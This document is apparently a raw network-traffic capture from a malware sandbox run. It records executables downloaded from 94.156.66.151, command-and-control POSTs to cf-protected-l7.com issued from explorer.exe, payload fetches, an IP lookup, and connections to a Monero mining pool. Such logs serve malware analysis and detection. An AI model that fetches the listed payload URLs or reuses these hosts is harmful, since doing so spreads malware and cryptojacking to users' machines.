                                                                                                                          142.250.179.170
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          IN A
                                                                                                                          142.250.179.202
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          IN A
                                                                                                                          142.251.36.10
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          IN A
                                                                                                                          142.251.39.106
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          IN A
                                                                                                                          172.217.23.202
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          IN A
                                                                                                                          216.58.208.106
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          IN A
                                                                                                                          216.58.214.10
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          IN A
                                                                                                                          142.250.179.138
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          IN A
                                                                                                                          142.251.36.42
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          IN Unknown
                                                                                                                          Response
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          234.168.217.172.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          234.168.217.172.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                          234.168.217.172.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          ams15s40-in-f101e100net
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          23.236.111.52.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          23.236.111.52.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          88.156.103.20.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          88.156.103.20.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                        • flag-de
                                                                                                                          POST
                                                                                                                          http://cf-protected-l7.com/api/endpoint.php
                                                                                                                          explorer.exe
                                                                                                                          Remote address:
                                                                                                                          134.255.231.136:80
                                                                                                                          Request
                                                                                                                          POST /api/endpoint.php HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Connection: close
                                                                                                                          Content-Length: 514
                                                                                                                          Content-Type: application/json
                                                                                                                          Host: cf-protected-l7.com
                                                                                                                          User-Agent: cpp-httplib/0.12.6
                                                                                                                          Response
                                                                                                                          HTTP/1.1 200 OK
                                                                                                                          Date: Tue, 19 Mar 2024 02:12:11 GMT
                                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                          X-Powered-By: PHP/8.0.30
                                                                                                                          Content-Length: 17
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          26.35.223.20.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          26.35.223.20.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          tse1.mm.bing.net
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          tse1.mm.bing.net
                                                                                                                          IN A
                                                                                                                          Response
                                                                                                                          tse1.mm.bing.net
                                                                                                                          IN CNAME
                                                                                                                          mm-mm.bing.net.trafficmanager.net
                                                                                                                          mm-mm.bing.net.trafficmanager.net
                                                                                                                          IN CNAME
                                                                                                                          dual-a-0001.a-msedge.net
                                                                                                                          dual-a-0001.a-msedge.net
                                                                                                                          IN A
                                                                                                                          204.79.197.200
                                                                                                                          dual-a-0001.a-msedge.net
                                                                                                                          IN A
                                                                                                                          13.107.21.200
                                                                                                                        • flag-us
                                                                                                                          GET
                                                                                                                          https://tse1.mm.bing.net/th?id=OADD2.10239340418570_1AILBHE008ZL9RHPC&pid=21.2&w=1080&h=1920&c=4
                                                                                                                          Remote address:
                                                                                                                          204.79.197.200:443
                                                                                                                          Request
                                                                                                                          GET /th?id=OADD2.10239340418570_1AILBHE008ZL9RHPC&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
                                                                                                                          host: tse1.mm.bing.net
                                                                                                                          accept: */*
                                                                                                                          accept-encoding: gzip, deflate, br
                                                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                                                                                                          Response
                                                                                                                          HTTP/2.0 200
                                                                                                                          cache-control: public, max-age=2592000
                                                                                                                          content-length: 623110
                                                                                                                          content-type: image/jpeg
                                                                                                                          x-cache: TCP_HIT
                                                                                                                          access-control-allow-origin: *
                                                                                                                          access-control-allow-headers: *
                                                                                                                          access-control-allow-methods: GET, POST, OPTIONS
                                                                                                                          timing-allow-origin: *
                                                                                                                          report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
                                                                                                                          nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                          x-msedge-ref: Ref A: E299941DC48E458696FE99281CD99767 Ref B: LON04EDGE1118 Ref C: 2024-03-18T18:12:21Z
                                                                                                                          date: Mon, 18 Mar 2024 18:12:21 GMT
                                                                                                                        • flag-us
                                                                                                                          GET
                                                                                                                          https://tse1.mm.bing.net/th?id=OADD2.10239360607761_1X7SCS2IJANBBPHGW&pid=21.2&w=1920&h=1080&c=4
                                                                                                                          Remote address:
                                                                                                                          204.79.197.200:443
                                                                                                                          Request
                                                                                                                          GET /th?id=OADD2.10239360607761_1X7SCS2IJANBBPHGW&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
                                                                                                                          host: tse1.mm.bing.net
                                                                                                                          accept: */*
                                                                                                                          accept-encoding: gzip, deflate, br
                                                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                                                                                                          Response
                                                                                                                          HTTP/2.0 200
                                                                                                                          cache-control: public, max-age=2592000
                                                                                                                          content-length: 519937
                                                                                                                          content-type: image/jpeg
                                                                                                                          x-cache: TCP_HIT
                                                                                                                          access-control-allow-origin: *
                                                                                                                          access-control-allow-headers: *
                                                                                                                          access-control-allow-methods: GET, POST, OPTIONS
                                                                                                                          timing-allow-origin: *
                                                                                                                          report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
                                                                                                                          nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                          x-msedge-ref: Ref A: 5A0F4B48C442493CBB019D4C6DA35287 Ref B: LON04EDGE1118 Ref C: 2024-03-18T18:12:21Z
                                                                                                                          date: Mon, 18 Mar 2024 18:12:21 GMT
                                                                                                                        • flag-us
                                                                                                                          GET
                                                                                                                          https://tse1.mm.bing.net/th?id=OADD2.10239340418569_13408TD3CSPQQLS8W&pid=21.2&w=1920&h=1080&c=4
                                                                                                                          Remote address:
                                                                                                                          204.79.197.200:443
                                                                                                                          Request
                                                                                                                          GET /th?id=OADD2.10239340418569_13408TD3CSPQQLS8W&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
                                                                                                                          host: tse1.mm.bing.net
                                                                                                                          accept: */*
                                                                                                                          accept-encoding: gzip, deflate, br
                                                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                                                                                                          Response
                                                                                                                          HTTP/2.0 200
                                                                                                                          cache-control: public, max-age=2592000
                                                                                                                          content-length: 457945
                                                                                                                          content-type: image/jpeg
                                                                                                                          x-cache: TCP_HIT
                                                                                                                          access-control-allow-origin: *
                                                                                                                          access-control-allow-headers: *
                                                                                                                          access-control-allow-methods: GET, POST, OPTIONS
                                                                                                                          timing-allow-origin: *
                                                                                                                          report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
                                                                                                                          nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                          x-msedge-ref: Ref A: 01564E89FED941E391BC92767EF2E755 Ref B: LON04EDGE1118 Ref C: 2024-03-18T18:12:21Z
                                                                                                                          date: Mon, 18 Mar 2024 18:12:21 GMT
                                                                                                                        • flag-us
                                                                                                                          GET
                                                                                                                          https://tse1.mm.bing.net/th?id=OADD2.10239360607763_1FO0BOSDEQ7YV4Y6R&pid=21.2&w=1080&h=1920&c=4
                                                                                                                          Remote address:
                                                                                                                          204.79.197.200:443
                                                                                                                          Request
                                                                                                                          GET /th?id=OADD2.10239360607763_1FO0BOSDEQ7YV4Y6R&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
                                                                                                                          host: tse1.mm.bing.net
                                                                                                                          accept: */*
                                                                                                                          accept-encoding: gzip, deflate, br
                                                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                                                                                                          Response
                                                                                                                          HTTP/2.0 200
                                                                                                                          cache-control: public, max-age=2592000
                                                                                                                          content-length: 509846
                                                                                                                          content-type: image/jpeg
                                                                                                                          x-cache: TCP_HIT
                                                                                                                          access-control-allow-origin: *
                                                                                                                          access-control-allow-headers: *
                                                                                                                          access-control-allow-methods: GET, POST, OPTIONS
                                                                                                                          timing-allow-origin: *
                                                                                                                          report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
                                                                                                                          nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                          x-msedge-ref: Ref A: 164DA36D2A6C48ECBC6627CA596DAF82 Ref B: LON04EDGE1118 Ref C: 2024-03-18T18:12:21Z
                                                                                                                          date: Mon, 18 Mar 2024 18:12:21 GMT
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          123.10.44.20.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          123.10.44.20.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                        • flag-de
                                                                                                                          POST
                                                                                                                          http://cf-protected-l7.com/api/endpoint.php
                                                                                                                          explorer.exe
                                                                                                                          Remote address:
                                                                                                                          134.255.231.136:80
                                                                                                                          Request
                                                                                                                          POST /api/endpoint.php HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Connection: close
                                                                                                                          Content-Length: 524
                                                                                                                          Content-Type: application/json
                                                                                                                          Host: cf-protected-l7.com
                                                                                                                          User-Agent: cpp-httplib/0.12.6
                                                                                                                          Response
                                                                                                                          HTTP/1.1 200 OK
                                                                                                                          Date: Tue, 19 Mar 2024 02:13:11 GMT
                                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                          X-Powered-By: PHP/8.0.30
                                                                                                                          Content-Length: 479
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          83.23.94.141.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          83.23.94.141.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                          83.23.94.141.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          vps-e1036e6dvpsovhnet
                                                                                                                        • 94.156.66.151:80
                                                                                                                          http://94.156.66.151/
                                                                                                                          http
                                                                                                                          chrome.exe
                                                                                                                          704 B
                                                                                                                          2.3kB
                                                                                                                          6
                                                                                                                          5

                                                                                                                          HTTP Request

                                                                                                                          GET http://94.156.66.151/

                                                                                                                          HTTP Response

                                                                                                                          200
                                                                                                                        • 94.156.66.151:80
                                                                                                                          http://94.156.66.151/icons/blank.gif
                                                                                                                          http
                                                                                                                          chrome.exe
                                                                                                                          650 B
                                                                                                                          628 B
                                                                                                                          6
                                                                                                                          4

                                                                                                                          HTTP Request

                                                                                                                          GET http://94.156.66.151/icons/blank.gif

                                                                                                                          HTTP Response

                                                                                                                          200
                                                                                                                        • 94.156.66.151:80
                                                                                                                          http://94.156.66.151/gfgghdhwhatsup.exe
                                                                                                                          http
                                                                                                                          chrome.exe
                                                                                                                          109.0kB
                                                                                                                          5.4MB
                                                                                                                          2242
                                                                                                                          3882

                                                                                                                          HTTP Request

                                                                                                                          GET http://94.156.66.151/icons/unknown.gif

                                                                                                                          HTTP Response

                                                                                                                          200

                                                                                                                          HTTP Request

                                                                                                                          GET http://94.156.66.151/favicon.ico

                                                                                                                          HTTP Response

                                                                                                                          404

                                                                                                                          HTTP Request

                                                                                                                          GET http://94.156.66.151/gfgghdhwhatsup.exe

                                                                                                                          HTTP Response

                                                                                                                          200
                                                                                                                        • 94.156.66.151:80
                                                                                                                          http://94.156.66.151/icons/binary.gif
                                                                                                                          http
                                                                                                                          chrome.exe
                                                                                                                          651 B
                                                                                                                          726 B
                                                                                                                          6
                                                                                                                          4

                                                                                                                          HTTP Request

                                                                                                                          GET http://94.156.66.151/icons/binary.gif

                                                                                                                          HTTP Response

                                                                                                                          200
                                                                                                                        • 20.231.121.79:80
                                                                                                                          46 B
                                                                                                                          1
                                                                                                                        • 94.156.66.151:80
                                                                                                                          chrome.exe
                                                                                                                          386 B
                                                                                                                          184 B
                                                                                                                          8
                                                                                                                          4
                                                                                                                        • 94.156.66.151:80
                                                                                                                          http://94.156.66.151/hghghjhfhleviticus.exe
                                                                                                                          http
                                                                                                                          chrome.exe
                                                                                                                          24.9kB
                                                                                                                          1.3MB
                                                                                                                          510
                                                                                                                          915

                                                                                                                          HTTP Request

                                                                                                                          GET http://94.156.66.151/ghfhhminfudk.exe

                                                                                                                          HTTP Response

                                                                                                                          200

                                                                                                                          HTTP Request

                                                                                                                          GET http://94.156.66.151/hghghjhfhleviticus.exe

                                                                                                                          HTTP Response

                                                                                                                          200
                                                                                                                        • 204.79.197.200:443
                                                                                                                          https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=
                                                                                                                          tls, http2
                                                                                                                          2.0kB
                                                                                                                          9.7kB
                                                                                                                          22
                                                                                                                          18

                                                                                                                          HTTP Request

                                                                                                                          GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=

                                                                                                                          HTTP Response

                                                                                                                          204

                                                                                                                          HTTP Request

                                                                                                                          GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=

                                                                                                                          HTTP Response

                                                                                                                          204

                                                                                                                          HTTP Request

                                                                                                                          GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=

                                                                                                                          HTTP Response

                                                                                                                          204
                                                                                                                        • 94.156.66.151:39001
                                                                                                                          gjhfhgdg.insane.wang
                                                                                                                          vbc.exe
                                                                                                                          534 B
                                                                                                                          432 B
                                                                                                                          9
                                                                                                                          7
                                                                                                                        • 49.13.193.134:443
                                                                                                                          https://api.filedoge.com/download/1591130eaa3b8a96895bff8d686e7ec2697f986974508c85f0b051191a853aa069fe7ce03179e1c20ec7
                                                                                                                          tls, http
                                                                                                                          vbc.exe
                                                                                                                          77.0kB
                                                                                                                          3.4MB
                                                                                                                          1501
                                                                                                                          2421

                                                                                                                          HTTP Request

                                                                                                                          GET https://api.filedoge.com/download/1591130eaa3b8a96895bff8d686e7ec2697f986974508c85f0b051191a853aa069fe7ce03179e1c20ec7

                                                                                                                          HTTP Response

                                                                                                                          200
                                                                                                                        • 94.156.66.151:3634
                                                                                                                          gjhfhgdg.insane.wang
                                                                                                                          tls
                                                                                                                          dfsdff.exe
                                                                                                                          2.1kB
                                                                                                                          3.0kB
                                                                                                                          22
                                                                                                                          19
                                                                                                                        • 195.201.57.90:443
                                                                                                                          https://ipwho.is/
                                                                                                                          tls, http
                                                                                                                          dfsdff.exe
                                                                                                                          1.3kB
                                                                                                                          5.8kB
                                                                                                                          12
                                                                                                                          10

                                                                                                                          HTTP Request

                                                                                                                          GET https://ipwho.is/

                                                                                                                          HTTP Response

                                                                                                                          200
                                                                                                                        • 134.255.231.136:80
                                                                                                                          cf-protected-l7.com
                                                                                                                          explorer.exe
                                                                                                                          98 B
                                                                                                                          80 B
                                                                                                                          2
                                                                                                                          2
                                                                                                                        • 51.89.23.91:10300
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          explorer.exe
                                                                                                                          1.1kB
                                                                                                                          2.8kB
                                                                                                                          11
                                                                                                                          10
                                                                                                                        • 172.217.168.234:443
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          tls
                                                                                                                          2.0kB
                                                                                                                          8.0kB
                                                                                                                          18
                                                                                                                          19
                                                                                                                        • 134.255.231.136:80
                                                                                                                          http://cf-protected-l7.com/api/endpoint.php
                                                                                                                          http
                                                                                                                          explorer.exe
                                                                                                                          1.0kB
                                                                                                                          479 B
                                                                                                                          7
                                                                                                                          5

                                                                                                                          HTTP Request

                                                                                                                          POST http://cf-protected-l7.com/api/endpoint.php

                                                                                                                          HTTP Response

                                                                                                                          200
                                                                                                                        • 204.79.197.200:443
                                                                                                                          tse1.mm.bing.net
                                                                                                                          tls, http2
                                                                                                                          1.3kB
                                                                                                                          8.1kB
                                                                                                                          17
                                                                                                                          14
                                                                                                                        • 204.79.197.200:443
                                                                                                                          tse1.mm.bing.net
                                                                                                                          tls, http2
                                                                                                                          1.3kB
                                                                                                                          8.2kB
                                                                                                                          17
                                                                                                                          15
                                                                                                                        • 204.79.197.200:443
                                                                                                                          https://tse1.mm.bing.net/th?id=OADD2.10239360607763_1FO0BOSDEQ7YV4Y6R&pid=21.2&w=1080&h=1920&c=4
                                                                                                                          tls, http2
                                                                                                                          78.7kB
                                                                                                                          2.2MB
                                                                                                                          1598
                                                                                                                          1591

                                                                                                                          HTTP Request

                                                                                                                          GET https://tse1.mm.bing.net/th?id=OADD2.10239340418570_1AILBHE008ZL9RHPC&pid=21.2&w=1080&h=1920&c=4

                                                                                                                          HTTP Request

                                                                                                                          GET https://tse1.mm.bing.net/th?id=OADD2.10239360607761_1X7SCS2IJANBBPHGW&pid=21.2&w=1920&h=1080&c=4

                                                                                                                          HTTP Request

                                                                                                                          GET https://tse1.mm.bing.net/th?id=OADD2.10239340418569_13408TD3CSPQQLS8W&pid=21.2&w=1920&h=1080&c=4

                                                                                                                          HTTP Request

                                                                                                                          GET https://tse1.mm.bing.net/th?id=OADD2.10239360607763_1FO0BOSDEQ7YV4Y6R&pid=21.2&w=1080&h=1920&c=4

                                                                                                                          HTTP Response

                                                                                                                          200

                                                                                                                          HTTP Response

                                                                                                                          200

                                                                                                                          HTTP Response

                                                                                                                          200

                                                                                                                          HTTP Response

                                                                                                                          200
                                                                                                                        • 204.79.197.200:443
                                                                                                                          tse1.mm.bing.net
                                                                                                                          tls, http2
                                                                                                                          1.2kB
                                                                                                                          8.1kB
                                                                                                                          16
                                                                                                                          14
                                                                                                                        • 134.255.231.136:80
                                                                                                                          http://cf-protected-l7.com/api/endpoint.php
                                                                                                                          http
                                                                                                                          explorer.exe
                                                                                                                          973 B
                                                                                                                          942 B
                                                                                                                          6
                                                                                                                          5

                                                                                                                          HTTP Request

                                                                                                                          POST http://cf-protected-l7.com/api/endpoint.php

                                                                                                                          HTTP Response

                                                                                                                          200
                                                                                                                        • 141.94.23.83:10300
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          explorer.exe
                                                                                                                          774 B
                                                                                                                          509 B
                                                                                                                          4
                                                                                                                          3
                                                                                                                        • 94.156.66.151:39001
                                                                                                                          gjhfhgdg.insane.wang
                                                                                                                          vbc.exe
                                                                                                                          488 B
                                                                                                                          328 B
                                                                                                                          8
                                                                                                                          7
                                                                                                                        • 8.8.8.8:53
                                                                                                                          76.32.126.40.in-addr.arpa
                                                                                                                          dns
                                                                                                                          71 B
                                                                                                                          157 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          76.32.126.40.in-addr.arpa

                                                                                                                        • 8.8.8.8:53
                                                                                                                          65.179.17.96.in-addr.arpa
                                                                                                                          dns
                                                                                                                          71 B
                                                                                                                          135 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          65.179.17.96.in-addr.arpa

                                                                                                                        • 8.8.8.8:53
                                                                                                                          95.221.229.192.in-addr.arpa
                                                                                                                          dns
                                                                                                                          73 B
                                                                                                                          144 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          95.221.229.192.in-addr.arpa

                                                                                                                        • 8.8.8.8:53
                                                                                                                          151.66.156.94.in-addr.arpa
                                                                                                                          dns
                                                                                                                          72 B
                                                                                                                          132 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          151.66.156.94.in-addr.arpa

                                                                                                                        • 8.8.8.8:53
                                                                                                                          241.154.82.20.in-addr.arpa
                                                                                                                          dns
                                                                                                                          72 B
                                                                                                                          158 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          241.154.82.20.in-addr.arpa

                                                                                                                        • 224.0.0.251:5353
                                                                                                                          chrome.exe
                                                                                                                          204 B
                                                                                                                          3
                                                                                                                        • 8.8.8.8:53
                                                                                                                          41.110.16.96.in-addr.arpa
                                                                                                                          dns
                                                                                                                          71 B
                                                                                                                          135 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          41.110.16.96.in-addr.arpa

                                                                                                                        • 8.8.8.8:53
                                                                                                                          241.150.49.20.in-addr.arpa
                                                                                                                          dns
                                                                                                                          72 B
                                                                                                                          158 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          241.150.49.20.in-addr.arpa

                                                                                                                        • 8.8.8.8:53
                                                                                                                          g.bing.com
                                                                                                                          dns
                                                                                                                          56 B
                                                                                                                          158 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          g.bing.com

                                                                                                                          DNS Response

                                                                                                                          204.79.197.200
                                                                                                                          13.107.21.200

                                                                                                                        • 8.8.8.8:53
                                                                                                                          200.197.79.204.in-addr.arpa
                                                                                                                          dns
                                                                                                                          73 B
                                                                                                                          106 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          200.197.79.204.in-addr.arpa

                                                                                                                        • 8.8.8.8:53
                                                                                                                          232.168.11.51.in-addr.arpa
                                                                                                                          dns
                                                                                                                          72 B
                                                                                                                          158 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          232.168.11.51.in-addr.arpa

                                                                                                                        • 8.8.8.8:53
                                                                                                                          gjhfhgdg.insane.wang
                                                                                                                          dns
                                                                                                                          vbc.exe
                                                                                                                          66 B
                                                                                                                          82 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          gjhfhgdg.insane.wang

                                                                                                                          DNS Response

                                                                                                                          94.156.66.151

                                                                                                                        • 8.8.8.8:53
                                                                                                                          157.123.68.40.in-addr.arpa
                                                                                                                          dns
                                                                                                                          72 B
                                                                                                                          146 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          157.123.68.40.in-addr.arpa

                                                                                                                        • 8.8.8.8:53
                                                                                                                          28.118.140.52.in-addr.arpa
                                                                                                                          dns
                                                                                                                          72 B
                                                                                                                          158 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          28.118.140.52.in-addr.arpa

                                                                                                                        • 8.8.8.8:53
                                                                                                                          171.39.242.20.in-addr.arpa
                                                                                                                          dns
                                                                                                                          72 B
                                                                                                                          158 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          171.39.242.20.in-addr.arpa

                                                                                                                        • 8.8.8.8:53
                                                                                                                          18.134.221.88.in-addr.arpa
                                                                                                                          dns
                                                                                                                          72 B
                                                                                                                          137 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          18.134.221.88.in-addr.arpa

                                                                                                                        • 8.8.8.8:53
                                                                                                                          183.142.211.20.in-addr.arpa
                                                                                                                          dns
                                                                                                                          73 B
                                                                                                                          159 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          183.142.211.20.in-addr.arpa

                                                                                                                        • 8.8.8.8:53
                                                                                                                          api.filedoge.com
                                                                                                                          dns
                                                                                                                          vbc.exe
                                                                                                                          62 B
                                                                                                                          78 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          api.filedoge.com

                                                                                                                          DNS Response

                                                                                                                          49.13.193.134

                                                                                                                        • 8.8.8.8:53
                                                                                                                          134.193.13.49.in-addr.arpa
                                                                                                                          dns
                                                                                                                          72 B
                                                                                                                          129 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          134.193.13.49.in-addr.arpa

                                                                                                                        • 8.8.8.8:53
                                                                                                                          ipwho.is
                                                                                                                          dns
                                                                                                                          dfsdff.exe
                                                                                                                          54 B
                                                                                                                          70 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          ipwho.is

                                                                                                                          DNS Response

                                                                                                                          195.201.57.90

                                                                                                                        • 8.8.8.8:53
                                                                                                                          75.179.17.96.in-addr.arpa
                                                                                                                          dns
                                                                                                                          142 B
                                                                                                                          135 B
                                                                                                                          2
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          75.179.17.96.in-addr.arpa

                                                                                                                          DNS Request

                                                                                                                          75.179.17.96.in-addr.arpa

                                                                                                                        • 8.8.8.8:53
                                                                                                                          90.57.201.195.in-addr.arpa
                                                                                                                          dns
                                                                                                                          72 B
                                                                                                                          129 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          90.57.201.195.in-addr.arpa

                                                                                                                        • 8.8.8.8:53
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          dns
                                                                                                                          explorer.exe
                                                                                                                          132 B
                                                                                                                          242 B
                                                                                                                          2
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          xmr-eu1.nanopool.org

                                                                                                                          DNS Request

                                                                                                                          xmr-eu1.nanopool.org

                                                                                                                          DNS Response

                                                                                                                          162.19.224.121
                                                                                                                          51.15.58.224
                                                                                                                          54.37.137.114
                                                                                                                          51.15.65.182
                                                                                                                          51.89.23.91
                                                                                                                          146.59.154.106
                                                                                                                          163.172.154.142
                                                                                                                          54.37.232.103
                                                                                                                          141.94.23.83
                                                                                                                          51.15.193.130
                                                                                                                          212.47.253.124

                                                                                                                        • 8.8.8.8:53
                                                                                                                          cf-protected-l7.com
                                                                                                                          dns
                                                                                                                          explorer.exe
                                                                                                                          65 B
                                                                                                                          81 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          cf-protected-l7.com

                                                                                                                          DNS Response

                                                                                                                          134.255.231.136

                                                                                                                        • 8.8.8.8:53
                                                                                                                          136.231.255.134.in-addr.arpa
                                                                                                                          dns
                                                                                                                          74 B
                                                                                                                          120 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          136.231.255.134.in-addr.arpa

